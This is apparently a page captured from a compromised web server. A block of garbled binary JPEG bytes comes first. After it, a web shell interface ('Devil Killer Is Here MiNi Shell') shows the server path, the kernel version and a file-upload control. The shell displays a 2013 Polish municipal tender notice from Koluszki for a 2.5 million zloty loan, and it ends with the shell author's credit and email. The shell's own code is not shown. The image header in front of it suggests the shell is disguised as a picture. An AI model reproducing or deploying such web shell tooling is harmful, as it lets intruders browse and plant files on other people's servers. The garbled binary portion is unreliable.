JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131001/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131001/200915-N-2013.html

<p class="kh_header"><b>Koluszki: Zaciągnięcie długoterminowego kredytu bankowego w wysokości : 2.500 000,00 zł.  słownie: dwa miliony, pięćset  tysięcy  złotych przeznaczonych na  sfinansowanie  deficytu budżetowego Gminy Koluszki  oraz  spłatę  wcześniej zaciągniętych  zobowiązań.</b><br>
<b>Numer ogłoszenia: 200915 - 2013; data zamieszczenia: 01.10.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miejski w Koluszkach , ul. 11-go Listopada 65, 95-040 Koluszki, woj. łódzkie, tel. 044 7256700, faks 044 7145840.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.koluszki.samorzady.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zaciągnięcie długoterminowego kredytu bankowego w wysokości : 2.500 000,00 zł.  słownie: dwa miliony, pięćset  tysięcy  złotych przeznaczonych na  sfinansowanie  deficytu budżetowego Gminy Koluszki  oraz  spłatę  wcześniej zaciągniętych  zobowiązań..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1) Przedmiotem  niniejszego  zamówienia  jest  zaciągnięcie  długoterminowego  kredytu bankowego  w wysokości : 2.500 000,00 zł.  słownie : dwa  miliony, pięćset  tysięcy  złotych  przeznaczonych  na  sfinansowanie  deficytu  budżetowego  Gminy  Koluszki  oraz  spłatę  wcześniej  zaciągniętych  zobowiązań.
2) Uruchomienie  środków z kredytu odbywać się  będzie na  pisemny  wniosek 
Zamawiającego  z  3 -dniowym  wyprzedzeniem.  Następny  dzień  po  podpisaniu  umowy  będzie dniem  postawienia  kredytu do dyspozycji Zamawiającego. Kredyt  będzie wzięty w  terminie  dostosowanym  do aktualnych  potrzeb Zamawiającego
tj.  w  okresie  od  dnia 18  października  2013 r.  do  dnia 31  grudnia 2013 r. 
3)  Zamawiający  zastrzega  sobie możliwość  niewykorzystania  pełnej  kwoty  kredytu   bez  dodatkowych  obciążeń  finansowych  jednak  kwota  zaciągniętego  kredytu nie  będzie mniejsza  niż  1.000.000, 00 zł   słownie:  jeden  milion  złotych.
4)  Obsługa   kredytu  będzie  dotyczyła  faktycznej  kwoty  wykorzystanego  kredytu.
5)  Środki  z  kredytu  bankowego  będą  przekazane  na  rachunek  Gminy  Koluszki. 
Warunki  udzielenia  i  spłaty  zaciągniętego  kredytu 
1) Spłata  całej  kwoty  zaciągniętego  kredytu  będzie  następowała  od  stycznia  2014 r. do  grudnia  2023 r. tj. przez okres 10 lat  w  następujących  terminach  
i  kwotach:
a) dziesięć  rat  płatnych  w  ostatnim  dniu roboczym  miesiąca  stycznia  każdego roku   będą  wynosiły  po  21.200 ,00 zł  słownie:  dwadzieścia  jeden  tysięcy  dwieście złotych, 
b) pozostałych  sto  dziesięć  rat  płatnych w ostatnich  dniach  roboczych 
w  miesiącach od  lutego  do  grudnia  każdego  roku  będzie wynosiło  po  
20.800,00 zł  ( słownie : dwadzieścia  tysięcy osiemset złotych ).     
2) Do każdej ze 120 rat  należy naliczyć  odsetki  od  faktycznie  zaciągniętego  kredytu. 
3) Kredyt może być  spłacony  przed  terminem  spłaty  bez  konieczności ponoszenia dodatkowych  opłat.  W  sytuacji,  gdy  kredyt  będzie spłacony  wcześniej  odsetki  będą liczone  do dnia  spłaty kredytu, a nie do końca okresu umowy. 
4) Wykonawcy przyjmują jako zabezpieczenie  kredytu  weksel  in  blanco wraz 
z  deklaracją wekslową.
5) Oprocentowanie  kredytu  będzie zmienne i  ustalone na podstawie stawki bazowej WIBOR 1 M  powiększonej  o  stałą  marżę  banku.  Stawka  bazowa jest  ustalona  na okres 1 miesiąca  i  stanowi  stopę WIBOR 1 M  z ostatniego dnia  roboczego każdego miesiąca i  ma zastosowanie  do odsetek naliczanych od pierwszego dnia następnego miesiąca  kalendarzowego. 
6) Spłata odsetek będzie następowała w terminach spłaty  kwot  zaciągniętego kredytu.  Każda z rat kredytu płatna będzie przelewem  tak, aby  środki znajdowały się na rachunku  banku  udzielającego  kredytu  w ostatnim  dniu  roboczym  miesiąca.
7) Odsetki  naliczane  będą od  kwoty  aktualnego  rzeczywistego  zadłużenia  
w  ratach miesięcznych  na  podstawie  zawiadomienia  przesłanego  przez  Bank Wykonawcę.
8) Rozliczenia  pomiędzy Zamawiającym, a Wykonawcą  będą dokonywane 
w złotych  polskich  ( PLN ).
9) Marża  banku  określona  w  procentach  powinna  być  stała w okresie  kredytowania  ( obowiązywania  umowy ). Jedynym  zyskiem  banku  będzie  stawka  WIBOR 1M  powiększona  o marżę  banku  od  wykorzystanego  kredytu.
10)  Zamawiający  zastrzega  sobie, że  kredyt  nie może być obciążony dodatkowymi   opłatami  za:  ubezpieczenie  kredytu, koszty manipulacyjne,  prowizję  przygotowawczą od udzielonego kredytu lub innymi  kosztami.
11) Kapitalizacja  odsetek  jest  niedopuszczalna..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 66.11.30.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.12.2023.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  uzna  ten  warunek  za  spełniony  na podstawie  podpisanych  oświadczeń: o spełnieniu  warunków udziału w  postępowaniu  o których  mowa  
w art. 22 ust. 1  i  braku podstaw  do wykluczenia w oparciu o art. 24 ust. 1 pkt. 2   Ustawy  Prawo  Zamówień  Publicznych,  oraz  gdy  Wykonawca  załączy  aktualny  odpis  z  właściwego  rejestru  lub  Centralnej  Ewidencji  i  Informacji o  Działalności Gospodarczej  Rzeczpospolitej Polskiej,  jeżeli odrębne przepisy wymagają  wpisu  do rejestru lub ewidencji  wystawionego  nie  wcześniej  niż  
6 miesięcy  przed upływem  terminu  składania  ofert  oraz,  gdy Wykonawca  posiada  aktualne zezwolenie  uprawniające  do  wykonywania  czynności  bankowych  wydane przez Komisję  Nadzoru  Bankowego  zgodnie  z ustawą z dnia  29.08.1997 r. Prawo  Bankowe   ( tj. Dz. U. z 2002 r. Nr 72, poz. 665  ze  zmianami )  lub  inne  zezwolenie potwierdzające, że Wykonawca  jest  uprawniony  do  wykonywania  czynności  bankowych.
Ocena  spełnienia  warunków  będzie  dokonywana  na  podstawie złożonych dokumentów  i  oświadczeń na zasadzie spełnia / nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna  ten warunek  za  spełniony na podstawie  podpisanego  oświadczenia  o  spełnieniu  warunków udziału w  postępowaniu  o  którym mowa  
w  art. 22 ust. 1  Ustawy  Prawo  Zamówień  Publicznych.
Ocena  spełnienia  warunków  będzie  dokonywana  na  podstawie złożonych dokumentów  i  oświadczeń na zasadzie spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna  ten warunek  za  spełniony na podstawie  podpisanego  oświadczenia  o  spełnieniu  warunków udziału w  postępowaniu  o  którym mowa  
w  art. 22 ust. 1  Ustawy  Prawo  Zamówień  Publicznych.
Ocena spełnienia  warunków  będzie  dokonywana  na  podstawie złożonych dokumentów i  oświadczeń na zasadzie spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna  ten warunek  za  spełniony na podstawie  podpisanego  oświadczenia  o  spełnieniu  warunków udziału w  postępowaniu  o  którym mowa  
w art. 22 ust. 1  Ustawy  Prawo  Zamówień  Publicznych.
Ocena spełnienia warunków  będzie  dokonywana  na  podstawie złożonych dokumentów  i  oświadczeń na zasadzie spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna  ten warunek  za  spełniony na podstawie  podpisanego  oświadczenia  o  spełnieniu  warunków udziału w  postępowaniu  o  którym mowa  
w  art. 22 ust. 1  Ustawy  Prawo  Zamówień  Publicznych.
Ocena spełnienia  warunków będzie  dokonywana  na  podstawie złożonych dokumentów  i  oświadczeń na zasadzie spełnia / nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Wypełniony formularz ofertowy ( załącznik  nr 1 do  S.I.W.Z. ) 
2) Wypełniony formularz spłaty  kredytu ( załącznik  nr  2  do  S.I.W.Z. ),
Specyfikacji  Istotnych Warunków  Zamówienia.
3) Zezwolenie  uprawniające do  wykonywania  czynności  bankowych  wydane przez Komisję  Nadzoru  Bankowego  zgodnie z  ustawą  z dnia 29.08.1997 r. Prawo Bankowe  ( tj. Dz. U. z 2002 r. Nr 72, poz. 665 ze zmianami ) lub  inne  zezwolenie  potwierdzające,  że  Wykonawca  jest  uprawniony  do  wykonywania  czynności  bankowych.
4)  W  przypadku,  gdy  podmioty  występują  wspólnie  Wykonawcy  powinni  ustanowić  pełnomocnika  do  reprezentowania  ich  w  postępowaniu  o udzielenie zamówienia,  albo  reprezentowania  w  postępowaniu  i  zawarcia  umowy  
w  sprawie  zamówienia  publicznego.  Pełnomocnictwo  powinno  być  w formie oryginału  lub  kopii  poświadczonej  przez  notariusza</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający  dopuszcza  zmianę  postanowień  zawartej umowy w stosunku do treści oferty na  podstawie  której  dokonano  wyboru  Wykonawcy w następujących 
przypadkach :
a) w  uzasadnionych przypadkach,  gdy  konieczna  będzie  zmiana  terminu realizacji zamówienia, Zamawiający  może zmienić  termin  wzięcia  raty kredytu lub  jego spłaty.
b) w  innych uzasadnionych  przypadkach,  gdy  zajdzie konieczność wprowadzenia zmian  wynikających z okoliczności,  których nie można było przewidzieć w chwili zawarcia umowy.
c) w przypadku,  gdy zmiany postanowień zawartej umowy będą  korzystne dla Zamawiającego  a  wynikły one w  trakcie realizacji  zamówienia. 
d) w  przypadku,  gdy zajdzie uzasadniona  konieczność  ograniczenia  lub rezygnacji 
z  części  kredytu  będącego przedmiotem niniejszego zamówienia, Zamawiający zastrzega  sobie  możliwość  zmniejszenia  kwoty  kredytu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.koluszki.samorzady.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd  Miejski w Koluszkach  ul. 11 Listopada 65 lok. nr 203.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.10.2013 godzina 09:30, miejsce: kancelaria Urzędu  Miejskiego w Koluszkach przy  ul. 11 Listopada 65.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com